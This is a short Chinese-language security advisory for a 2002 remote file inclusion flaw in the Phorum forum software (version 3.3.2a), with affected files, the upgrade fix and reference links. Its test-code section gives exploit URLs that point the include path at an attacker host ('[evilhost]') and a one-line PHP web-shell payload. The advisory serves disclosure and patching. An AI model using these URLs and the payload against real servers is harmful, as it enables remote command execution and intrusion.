Phorum存在任意命令可执行漏洞发布时间:2002-05-20 更新时间:2002-05-20 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:4736 受影响系统 Phorum Phorum 3.3.2 a详细描述 Phorum是基于WEB的论坛程序。 其中'plugin.php','admin.php' 和'del.php'对用户输入不正确检查,可导致攻击者包含远程主机中的文件并在系统上执行。 测试代码 http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls 其中远程主机中可包含如下代码的replace.php文件: <? echo("<? system(\"\$cmd\"); ?>"); ?> 解决方案 升级程序: Phorum Phorum 3.3.2 a: Phorum Upgrade phorum-3.3.2b3.tar.gz http://phorum.org/downloads/phorum-3.3.2b3.tar.gz 相关信息 Markus Arndt<markus-arndt@web.de>. 参考:http://online.securityfocus.com/archive/1/273077 http://online.securityfocus.com/archive/1/273008 http://online.securityfocus.com/archive/1/273080 相关主页:http://www.phorum.org/ |
